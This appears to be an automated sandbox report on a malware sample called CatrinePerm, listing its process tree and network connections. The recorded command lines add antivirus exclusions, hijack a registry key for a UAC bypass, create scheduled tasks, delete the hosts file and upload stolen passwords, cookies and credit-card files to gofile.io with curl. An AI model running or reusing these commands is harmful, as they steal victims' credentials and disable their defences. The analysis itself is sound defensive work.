PID 2192 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 3528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 3528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 3528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 3528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 3528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 3528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 3528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 3528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 3528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 3528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 3528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 3528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 3528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 3528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 3528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 3528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 3528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 3528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 3528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2192 wrote to memory of 3528 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\Gk67Vl.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe773146f8,0x7ffe77314708,0x7ffe77314718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4724 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5868 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1792 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4632 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5540 /prefetch:1

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap2958:84:7zEvent12321

C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe

"C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe"

C:\Users\Admin\AppData\Roaming\Win (3).exe

"C:\Users\Admin\AppData\Roaming\Win (3).exe"

C:\Users\Admin\AppData\Roaming\CatrinePerm.exe

"C:\Users\Admin\AppData\Roaming\CatrinePerm.exe"

C:\Users\Admin\AppData\Local\Temp\WinRAR.exe

"C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"

C:\Users\Admin\AppData\Local\Temp\pythonw.exe

"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"

C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe

"C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe"

C:\Users\Admin\AppData\Local\Temp\pythonw.exe

"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WinRAR.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WinRAR.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Update.exe'

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\browseconsole166.vbs" /f

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C computerdefaults.exe

C:\Windows\SysWOW64\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update.exe'

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN JavaAutoUpdateTask_tmDyfmMXN8Sx8SfXBvvH040MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\tmDyfmMXN8Sx8SfXBvvH040MX.exe" /RL HIGHEST /IT

C:\Windows\SysWOW64\wscript.exe

"wscript.exe" C:\Users\Admin\AppData\Local\Temp\browseconsole166.vbs

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC ONLOGON /TN JavaAutoUpdateTask_tmDyfmMXN8Sx8SfXBvvH040MX /TR "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\tmDyfmMXN8Sx8SfXBvvH040MX.exe" /RL HIGHEST /IT

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile

C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe

"C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\Admin\AppData\Roaming\Update.exe"

C:\Users\Admin\AppData\Roaming\Win (3).exe

"C:\Users\Admin\AppData\Roaming\Win (3).exe"

C:\Users\Admin\AppData\Roaming\CatrinePerm.exe

"C:\Users\Admin\AppData\Roaming\CatrinePerm.exe"

C:\Users\Admin\AppData\Local\Temp\WinRAR.exe

"C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile"

C:\Users\Admin\AppData\Local\Temp\pythonw.exe

"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"

C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe

"C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile

C:\Users\Admin\AppData\Local\Temp\pythonw.exe

"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\wscript.exe

"wscript.exe" C:\Users\Admin\AppData\Local\Temp\browseconsole166.vbs

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/RenameMove.hta" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin/Downloads/RenameMove.hta" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store1.gofile.io/uploadFile

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /7

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store1.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store1.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store1.gofile.io/uploadFile

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,9949712387377230984,8574134490945692394,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3088 /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store1.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store1.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store1.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/RenameMove.hta" https://store1.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin/Downloads/RenameMove.hta" https://store1.gofile.io/uploadFile

C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe

"C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe" Taskmgr.exe

C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe

"C:\Users\Admin\AppData\Local\Temp\opwotwbz.exe" explorer.exe

C:\Users\Admin\AppData\Roaming\Update.exe

C:\Users\Admin\AppData\Roaming\Update.exe

C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe

"C:\Users\Admin\Downloads\CatrinePerm\CatrinePerm.exe"

C:\Users\Admin\AppData\Roaming\Win (3).exe

"C:\Users\Admin\AppData\Roaming\Win (3).exe"

C:\Users\Admin\AppData\Roaming\CatrinePerm.exe

"C:\Users\Admin\AppData\Roaming\CatrinePerm.exe"

C:\Users\Admin\AppData\Local\Temp\WinRAR.exe

"C:\Users\Admin\AppData\Local\Temp\WinRAR.exe"

C:\Users\Admin\AppData\Local\Temp\pythonw.exe

"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"

C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe

"C:\Users\Admin\AppData\Local\Temp\RtkBtAudioServ.exe"

C:\Users\Admin\AppData\Local\Temp\pythonw.exe

"C:\Users\Admin\AppData\Local\Temp\pythonw.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Downloads/RenameMove.hta" https://store10.gofile.io/uploadFile"

C:\Windows\system32\curl.exe

curl -F "file=@C:\Users\Admin/Downloads/RenameMove.hta" https://store10.gofile.io/uploadFile

C:\Users\Admin\AppData\Roaming\Update.exe

C:\Users\Admin\AppData\Roaming\Update.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 6.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 176.178.17.96.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
GB 92.123.128.133:443 www.bing.com tcp
US 8.8.8.8:53 133.128.123.92.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 gofile.io udp
FR 51.178.66.33:443 gofile.io tcp
FR 51.178.66.33:443 gofile.io tcp
US 8.8.8.8:53 33.66.178.51.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 api.gofile.io udp
FR 151.80.29.83:443 api.gofile.io tcp
US 8.8.8.8:53 s.gofile.io udp
FR 51.75.242.210:443 s.gofile.io tcp
FR 51.75.242.210:443 s.gofile.io tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 83.29.80.151.in-addr.arpa udp
US 8.8.8.8:53 210.242.75.51.in-addr.arpa udp
US 8.8.8.8:53 store5.gofile.io udp
FR 31.14.70.250:443 store5.gofile.io tcp
FR 31.14.70.250:443 store5.gofile.io tcp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
FR 31.14.70.250:443 store5.gofile.io tcp
US 8.8.8.8:53 250.70.14.31.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 rentry.co udp
US 104.21.95.148:443 rentry.co tcp
